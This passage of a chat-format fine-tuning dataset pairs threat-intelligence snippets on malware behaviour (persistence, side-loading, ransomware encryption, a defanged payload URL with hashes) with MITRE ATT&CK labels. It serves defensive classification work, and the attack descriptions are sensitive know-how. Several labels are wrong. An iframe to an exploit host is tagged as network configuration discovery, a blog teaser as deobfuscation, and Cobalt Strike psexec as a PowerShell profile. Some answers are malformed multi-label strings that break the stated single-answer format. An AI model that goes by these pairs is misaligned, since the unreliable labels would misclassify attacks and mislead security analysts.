- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Orz can perform Registry operations."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The implementation details of Seaduke also have some similarities to WellMess, as both use encrypted cookies to transfer metadata about the data being sent and use obfuscated base64 data in HTTP requests as the contents of communications. These techniques are not unique to Blue Kitsune but provide an interesting correlation between the WellMess backdoor and Blue Kitsune tools used since 2015"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Version.dll and jucheck.exe are both important pieces of the execution chain used to launch BOOMMIC. Jucheck.exe is a legitimate java binary used to check for any updates. This file will load version.dll upon its execution. Version.dll is an unsigned and modified copy of a signed legitimate Windows DLL, normally found under %SYSTEMROOT%\\System32, but retains its PE header. An additional import was added to the modified version.dll, which imports the malicious function from javafx_font.dll."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "surveys a system upon check-in to discover network configuration details using the arp -a, nbtstat -n, and net config commands."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bumblebee has been delivered as password-protected zipped ISO files and used control-flow-flattening to obfuscate the flow of functions."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chinese state-sponsored cyber actors have been observed deleting files using rm or del commands. Several files that the cyber actors target would be timestomped, in order to show different times compared to when those files were created/used."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "jRAT has been distributed as HTA files with JScript."
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mandiant identified a campaign where the threat actors gained access to the target organization’s Microsoft 365 environment using a stolen session token. Mandiant analyzed the workstations belonging to the end user and discovered that some systems had been infected with CRYPTBOT, an info-stealer malware, shortly before the stolen session token was generated. Mandiant observed that in some cases the user downloaded the malware after browsing to low reputation websites offering free, or “cracked”, software."
- },
- {
- "role": "assistant",
- "content": "T1550.004 - Web Session Cookie"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cuba has used \"cmd.exe /c\" and batch files for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CSPY Downloader has attempted to appear as a legitimate Windows service with a fake description claiming it is used to support packed applications."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla RPC backdoors can be used to transfer files to/from victim machines on the local network."
- },
- {
- "role": "assistant",
- "content": "T1570 - Lateral Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Two days later, a second email — purportedly a warning from a Pakistani military about the Pegasus spyware — containing a cutt.ly link to a malicious encrypted Word document and the password for decryption will be sent to the target. The sender address impersonates a service similar to that on the first email (alert@ispr.gov.pk"
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Winnti for Windows has the ability to encrypt and compress its payload."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole can record sound using input audio devices."
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After compromising a victim, lists all running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once the VBScript has been decoded it reveals a rather complex set of functions. These implants are known as Torisma and Doris, both of which are base64 encoded. They are loaded directly into memory via a binary stream once conditions have been satisfied based on the logic contained within the script"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot has gained execution through users opening malicious attachments."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gold Dragon establishes persistence in the Startup folder."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Both create one thread, and each thread is responsible for either downloading and executing the file or running a command line program in the terminal: Figure 28. Commands used for downloading and executing, and running a command in terminal Figure 29. Commands used in uploading and downloading file Figure 30"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "(Source: Dell SecureWorks) As shown in Figure 10, the unpacked JavaScript code reveals an iframe pointing to an IP address that is hosting the exploit"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Finally, after the initial beaconing, receiving a configuration, and exfiltrating stolen information from the infected machine, AZORult may download the next payload. For example, in the campaign described at the beginning of this post, AZORult downloads Hermes 2.1 ransomware after it exfiltrates the victim’s data and credentials"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RCSession has the ability to modify a Registry Run key to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DEATHRANSOM creates an RSA-2048 public and private key pair. The shared secret is SHA256 hashed and used as the key to Salsa20 encrypt the RSA public and private keys. The RSA public key is used to encrypt the individual symmetric keys that are used to encrypt each file. A Base64 encoded version of the encrypted RSA keys and the victim’s Curve25519 public key is included in the ransom note, providing the threat actors the information needed to decrypt the victim's files. For the symmetric key, DEATHRANSOM calls RtlGenRandom to generate 32 random bytes. This is the 32 byte key used to AES encrypt each file. After the file is encrypted, the AES key is encrypted with the public RSA key and appended to the file. DEATHRANSOM lastly appends the four magic bytes of AB CD EF AB at the end of the encrypted file and uses this as a check to ensure that it does not encrypt an already encrypted file. The analyzed DEATHRANSOM sample used for comparison does not change the file extension"
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WellMess has used Base64 encoding to uniquely identify communication to and from the C2."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RDAT has masqueraded as VMware.exe."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It has the capability to find files, enumerate drives, exfiltrate data, take screenshots and provide a reverse shell"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture', 'T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Small Sieve has the ability to download files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WastedLocker's custom crypter, CryptOne, leveraged the VirtualAlloc() API function to help execute the payload."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During execution, Threat Group-3390 malware deobfuscates and decompresses code that was encoded with Metasploit’s shikata_ga_nai encoder as well as compressed with LZNT1 compression."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cuba loaded the payload into memory using PowerShell."
- },
- {
- "role": "assistant",
- "content": "T1620 - Reflective Code Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WarzoneRAT can use `cmd.exe` to execute malicious code."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It also creates a pipe for inter-process communication (IPC) by calling the pipe() function for getting two file descriptors for reading and writing data. It also enables non-blocking I/O for the writing file descriptor by using ioctl"
- },
- {
- "role": "assistant",
- "content": "T1559 - Inter-Process Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete renamed task names to masquerade as legitimate Google Chrome, Java, Dropbox, Adobe Reader and Python tasks."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT38 has conducted watering holes schemes to gain initial access to victims."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker made use of Cobalt Strike’s “psexec” lateral movement command to create a Windows service named with a random 16-character string on the target system and execute encoded PowerShell"
- },
- {
- "role": "assistant",
- "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ke3chang has used compromised credentials to sign into victims’ Microsoft 365 accounts."
- },
- {
- "role": "assistant",
- "content": "T1078.004 - Valid Accounts: Cloud Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "On another occasion, CVE-2021-26411 was used, which is another exploit targeting Internet Explorer and legacy versions of Microsoft Edge. The redirect code was set up in the same way as CVE-2020-1380, the only difference being the exploit code used. The key part of the exploit code used is given in Figures 3 and 4"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rocke has deleted files on infected machines."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BloodHound can compress data collected by its SharpHound ingestor into a ZIP file to be written to disk."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bisonal has been modified to be used as a Windows service."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ramsay can use the Windows COM API to schedule tasks and maintain persistence."
- },
- {
- "role": "assistant",
- "content": "T1559.001 - Component Object Model"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WarzoneRAT can download and execute additional files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uid= and writes a JSS Loader binary to %TEMP%\\PaintHelper.exe. JSS Loader, which has both .NET and C++ versions, has multiple capabilities, including the ability to load additional executables, PowerShell (PS) and JavaScript (JS) files"
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript', 'T1105 - Ingress Tool Transfer', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) User must open the Microsoft Word email attachment 2) User must scroll to page three of the document, which will run the DealersChoice Flash object 3) The Flash object must contact an active C2 server to download an additional Flash object containing exploit code 4) The initial Flash object must contact the same C2 server to download a secondary payload 5) Victim host must have a vulnerable version of Flash installed"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The payload was an AutoIT downloader that retrieved and executed additional PowerShell from hxxps://85.206.161[.]216:8080/HomePage.htm. The follow-on PowerShell profiled the target system’s architecture, downloaded the appropriate variant of PowerSploit (MD5: c326f156657d1c41a9c387415bf779d4 or 0564706ec38d15e981f71eaf474d0ab8), and reflectively loaded PUPYRAT (MD5: 94cd86a0a4d747472c2b3f1bc3279d77 or 17587668AC577FCE0B278420B8EB72AC)."
- },
- {
- "role": "assistant",
- "content": "T1620 - Reflective Code Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has used encoded PowerShell scripts uploaded to CozyCar installations to download and install SeaDuke. APT29 also used PowerShell to create new tasks on remote machines, identify configuration settings, evade defenses, exfiltrate data, and to execute other commands."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HermeticWizard can use a list of hardcoded credentials in attempt to authenticate to SMB shares."
- },
- {
- "role": "assistant",
- "content": "T1110.001 - Brute Force: Password Guessing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA505 has staged malware on actor-controlled domains."
- },
- {
- "role": "assistant",
- "content": "T1608.001 - Upload Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chinoxy has encrypted its configuration file."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Metamorfo has encrypted C2 commands with AES-256."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "More interesting however is it that it also contains support for windows execution via smb shares and IPC. The sample also has a Windows version of the malware embedded inside that it can install on remote windows shares and then execute as a service"
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Conti ransomware stops up to 146 Windows services related to security, backup, database, and email solutions through the use of net stop."
- },
- {
- "role": "assistant",
- "content": "T1489 - Service Stop"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The name of the local computer that corresponds to the IP address and the name of the port is shown unless the -n parameter is specified. If the port is not yet established, the port number is shown as an asterisk (*). Foreign Address The IP address and port number of the remote computer to which the socket is connected. If the port is not yet established, the port number is shown as an asterisk (*). (state) Indicates the state of a TCP connection. The possible states are as follows: CLOSE_WAIT CLOSED ESTABLISHED FIN_WAIT_1 FIN_WAIT_2 LAST_ACK LISTEN SYN_RECEIVED SYN_SEND TIMED_WAIT For more information about the states of a TCP connection, see RFC 793. Proto The name of the protocol (TCP or UDP). - Local Address The IP address of the local computer and the port number being used. The name of the local computer that corresponds to the IP address and the name of the port is shown unless the -n parameter is specified. If the port is not yet established, the port number is shown as an asterisk (*). - Foreign Address The IP address and port number of the remote computer to which the socket is connected. If the port is not yet established, the port number is shown as an asterisk (*). - - This command is available only if the Internet Protocol (TCP/IP) protocol is installed as a component in the properties of a network adapter in Network Connections"
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A dropper used by Putter Panda installs itself into the ASEP Registry key \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" with a value named McUpdate."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Donut can use HTTP to download previously staged shellcode payloads."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It only installs the second-stage script in the default registry value under the registry key HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\sibot. Variant B registers a scheduled task named Sibot and programmed to run daily. This task, which is saved by Windows in the file C:\\Windows\\System32\\Tasks\\Microsoft\\Windows\\WindowsUpdate\\sibot, runs the following command-line daily"
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 used legitimate executables to perform DLL side-loading of their malware."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects information about the OS and computer name."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects the computer name and host name on the compromised system."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HEXANE has targeted executives, human resources staff, and IT personnel for spearphishing."
- },
- {
- "role": "assistant",
- "content": "T1589.002 - Email Addresses"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ESET’s analysis of a recent backdoor used by TeleBots – the group behind the massive NotPetya ransomware outbreak – uncovers strong code similarities to the Industroyer main backdoor, revealing a rumored connection that was not previously proven The post New TeleBots backdoor: First evidence linking Industroyer to NotPetya appeared first on WeLiveSecurity"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "admin@338 actors used the following command following exploitation of a machine with LOWBALL malware to display network connections: \"netstat -ano >> %temp%\\download\""
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zox can enumerate files on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used encoded PowerShell scripts uploaded to installations to download and install . also used PowerShell scripts to evade defenses."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Felismus uses command line for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CreepySnail can use PowerShell for execution, including the cmdlets `Invoke-WebRequst` and `Invoke-Expression`."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Calisto uses launchctl to enable screen sharing on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1569.001 - System Services: Launchctl"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Revenge RAT has the ability to upload and download files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
